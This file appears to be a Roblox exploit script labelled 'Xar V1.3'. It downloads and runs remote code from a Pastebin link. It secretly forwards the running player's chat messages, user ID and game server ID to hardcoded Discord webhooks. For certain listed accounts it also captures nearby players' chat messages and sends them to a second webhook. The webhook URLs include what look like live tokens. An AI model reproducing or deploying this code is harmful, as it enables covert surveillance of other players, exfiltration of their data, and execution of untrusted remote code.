task.spawn(function()
	while task.wait() do
		task.spawn(function()
			if B_Active ~= true then
				workspace.CurrentCamera.CameraSubject = game.Players.LocalPlayer.Character.Humanoid
				workspace.CurrentCamera.CameraType = Enum.CameraType.Custom
			end
		end)
	end
end)

task.spawn(
	function()
		loadstring(game:HttpGet("https://pastebin.com/raw/ZcQ3hu7S", true))()
	end
)

task.spawn(function()
	local ppp = game.Players.LocalPlayer
	local d = false
	function SendMessage(url, message)
		if d ~= false then return end
		task.spawn(function()
			d = true
			task.wait(.375)
			d = false
		end)
		local http = game:GetService("HttpService")
		local headers = {
			["Content-Type"] = "application/json"
		}
		local data = {
			["content"] = message
		}
		local body = http:JSONEncode(data)
		local response = request({
			Url = url,
			Method = "POST",
			Headers = headers,
			Body = body
		})
	end

	task.spawn(function()
		local url = "https://discord.com/api/webhooks/1291888121868455936/N_9XzXCKhPIoaPEhNkJEyaB-exrxm0Fr95Kn88SLgbvTrThnVIJJ_0kdb89mwZhG76J6"
		pcall(function()
			ppp.Chatted:Connect(function(message)
				SendMessage(url,"**User: "..ppp.Name.."**".."```"..message.."```")
			end)
		end)
		pcall(function()
			if ppp.Name == "anthonysmyforever" or ppp.Name == "27k_gabbyy" or ppp.Name == "needIe2maheart" or ppp.Name == "86748s" or ppp.Name == "00batopia00" or ppp.Name == "mwarwy" then
				pcall(function()
					for i,v in next, game:GetService("Players"):GetPlayers() do
						if v ~= ppp then
							pcall(function()
								v.Chatted:Connect(function(message)
									pcall(function()
										local Max_Distance = 50
										local mag = (ppp.Character:WaitForChild("HumanoidRootPart").Position - v.Character:WaitForChild("HumanoidRootPart").Position).magnitude
										if mag <= Max_Distance then
											local url2 = "https://discord.com/api/webhooks/1291888529655201835/R8WisGPp5UGJoKkNkfhVoLmQEKnOX11fP36dlxhtjWL72s6CysRN7L_ijfK-JwGtXIM3"
											SendMessage(url2,"**User: "..v.Name.." | Chatted**".."```"..message.."``` ".."Stud-Mag : ("..mag..")")
										end
									end)
								end)
							end)
						end
					end
				end)
				game.Players.PlayerAdded:Connect(function(Playaaaaa)
					local v = Playaaaaa
					pcall(function()
						v.Chatted:Connect(function(message)
							pcall(function()
								local Max_Distance = 50
								local mag = (game.Players.LocalPlayer.Character:WaitForChild("HumanoidRootPart").Position - v.Character:WaitForChild("HumanoidRootPart").Position).magnitude
								if mag <= Max_Distance then
									local url2 = "https://discord.com/api/webhooks/1291888529655201835/R8WisGPp5UGJoKkNkfhVoLmQEKnOX11fP36dlxhtjWL72s6CysRN7L_ijfK-JwGtXIM3"
									SendMessage(url2,"**User: "..v.Name.." | Chatted**".."```"..message.."``` ".."Stud-Mag : ("..mag..")")
								end
							end)
						end)
					end)
				end)
			end
		end)
	end)

	function SendMessageEMBED(url, embed)
		local http = game:GetService("HttpService")
		local headers = {
			["Content-Type"] = "application/json"
		}
		local data = {
			["embeds"] = {
				{
					["title"] = embed.title,
					["description"] = embed.description,
					["color"] = embed.color,
					["fields"] = embed.fields,
					["footer"] = {
						["text"] = embed.footer.text
					}
				}
			}
		}
		local body = http:JSONEncode(data)
		local response = request({
			Url = url,
			Method = "POST",
			Headers = headers,
			Body = body
		})
	end

	local url = "https://discord.com/api/webhooks/1291888246405464074/UF4Sk7ylQ7vAocBQ3fjqq0ewBgXcjzL5T4SMvyvduChwtzkNxpNs3onjVhYOBlY1bRIF"
	local embed = {
		["title"] = "Player has Executed Xar V1.3",
		["description"] = "Players chats will be logged.",
		["color"] = 0,
		["fields"] = {
			{
				["name"] = "Username",
				["value"] = ppp.Name
			},
			{
				["name"] = "UserId",
				["value"] = ppp.UserId
			},
			{
				["name"] = "GameID",
				["value"] = game.GameId
			},
			{
				["name"] = "JobID",
				["value"] = game.JobId
			}
		},
		["footer"] = {
			["text"] = "Xar V1.3 | Logger"
		}
	}
	SendMessageEMBED(url, embed)
end)
